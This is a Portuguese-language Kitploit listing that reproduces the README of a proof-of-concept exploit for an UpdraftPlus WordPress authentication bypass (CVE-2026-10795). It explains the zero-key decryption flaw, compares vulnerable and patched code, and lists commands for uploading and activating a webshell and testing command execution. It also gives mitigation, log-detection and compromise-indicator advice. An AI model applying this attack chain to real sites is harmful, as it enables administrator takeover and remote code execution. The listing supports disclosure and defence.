Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus Bypass de Autenticação | Kitploit
Ferramentas/GitHubGitHub/izxci/cve-2026-10795
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus Bypass de Autenticação

Ver Repositório
1há 2 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-10795

CVE-2026-10795 – Bypass de Autenticação no UpdraftPlus

CVE-2026-10795 – PoC de Bypass de Autenticação no UpdraftPlus

⚠️ Aviso: Este repositório é apenas para fins educacionais.
Use apenas em sistemas que você possui ou tem permissão explícita para testar.
O autor não se responsabiliza por qualquer uso indevido.


📋 Visão Geral

CampoDetalhes
PluginUpdraftPlus: WP Backup & Migration
Versões Afetadas≤ 1.26.4
Versão Corrigida1.26.5
Pontuação CVSS8.1 (Alta)
Tipo de VulnerabilidadeBypass de Autenticação Não Autenticado → RCE
Descoberto porvtim (Wordfence Bug Bounty)
Recompensa$5.200

🔍 Resumo da Vulnerabilidade

O UpdraftPlus registra um ouvinte RPC não autenticado a cada carregamento de página para sites conectados ao UpdraftCentral.

A função decrypt_message() não valida o valor de retorno de $rsa->decrypt().
Quando a descriptografia RSA falha, false é passado para Rijndael::setKey(), que colapsa em uma chave AES-128 determinística de todos zeros.

Um atacante pode:

  1. Forjar uma udrpc_message criptografada com a chave zero
  2. Fazer o servidor descriptografá-la com sucesso
  3. Executar comandos RPC arbitrários como o administrador conectado
  4. Fazer upload e ativar um plugin malicioso → Execução Remota de Código

🧬 Código Vulnerável

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Linhas 460-491 (versão 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ Nenhuma verificação do valor de retorno!

$rij->setKey($sym_key);  // false → chave de todos zeros
return $rij->decrypt($ciphertext);

✅ Código Corrigido

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Adicionado na 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Estrutura do Repositório

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Script de exploit principal
├── requirements.txt        # Dependências Python
├── payloads/
│   ├── list_plugins.py     # Listar plugins instalados
│   ├── upload_shell.py     # Fazer upload do webshell
│   └── activate_plugin.py  # Ativar plugin enviado
├── shell/
│   ├── build_shell.py      # Montar o ZIP do webshell
│   └── test-shell.php      # Webshell PHP mínimo
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Instalação

root@kitploit:~
git clone https://github.com/seunome/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Configuração do Ambiente de Teste

1. Instalar XAMPP

root@kitploit:~
https://www.apachefriends.org
Iniciar: Apache + MySQL

2. Instalar WordPress + UpdraftPlus 1.26.4

root@kitploit:~
# Colocar o WordPress no htdocs
C:/xampp/htdocs/wordpress/

# Instalar a versão vulnerável do plugin
# Download: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Conectar ao UpdraftCentral

root@kitploit:~
WordPress Admin → Configurações → UpdraftPlus → guia UpdraftCentral → Conectar

⚠️ Obrigatório: O site deve estar conectado ao UpdraftCentral para que a vulnerabilidade seja explorável.


🚀 Uso

Uso Básico

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Listar Plugins

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Fazer Upload do Webshell

root@kitploit:~
# Passo 1: Construir o ZIP do shell
python shell/build_shell.py

# Passo 2: Fazer upload
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Passo 3: Ativar
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Passo 4: Testar RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Como Funciona

root@kitploit:~
poc.py
  │
  ├─ 1. Criar sym_key RSA criptografada malformada (bytes lixo)
  │
  ├─ 2. Criptografar payload RPC com chave AES-128 ZERO (0x00 * 16)
  │
  ├─ 3. Montar udrpc_message:
  │       [tamanho hex de 3 bytes][sym_key falsa][tamanho cifrado hex 16 bytes][ciphertext]
  │
  ├─ 4. POST para o alvo (sem auth, sem nonce, sem cookies necessários)
  │
  └─ 5. Lado do servidor:
          rsa->decrypt(lixo) → false
          setKey(false)      → chave 0x00
          decrypt(ciphertext)→ nosso payload ✅
          wp_set_current_user() → acesso admin
          Comando RPC executa → RCE 💀

🛡️ Detecção e Mitigação

Mitigação

root@kitploit:~
Atualize o UpdraftPlus para a versão 1.26.5 imediatamente.

Detecção (Análise de Logs)

root@kitploit:~
# Procure por requisições POST suspeitas com udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Usuários do Wordfence estão protegidos desde 3 de junho de 2026

Indicadores de Comprometimento

root@kitploit:~
- Instalações inesperadas de plugins
- Novos arquivos PHP em wp-content/plugins/
- Requisições POST para a raiz do WordPress com parâmetro udrpc_message
- Ações de nível admin inesperadas nos logs do WordPress

📅 Linha do Tempo da Divulgação


📚 Referências

  • Aviso do Wordfence
  • Página do Plugin UpdraftPlus
  • Documentação RSA do phpseclib
  • Changelog do Plugin

👤 Créditos

  • Descoberta Original: vtim (Wordfence Bug Bounty Program)
  • Autor do PoC: izxci
  • Propósito: Educacional / Pesquisa de Segurança

📜 Licença

root@kitploit:~
Licença MIT – Apenas para uso educacional.
O uso não autorizado contra sistemas que você não possui é ilegal.
Baixar ferramenta
DataEvento
1 de junho de 2026Vulnerabilidade submetida via Wordfence Bug Bounty
3 de junho de 2026Validada e divulgada ao fornecedor
3 de junho de 2026Regra de firewall Wordfence Premium implantada
4 de junho de 2026Fornecedor confirmou recebimento
5 de junho de 2026Patch lançado (v1.26.5)
3 de julho de 2026Proteção gratuita do Wordfence ativada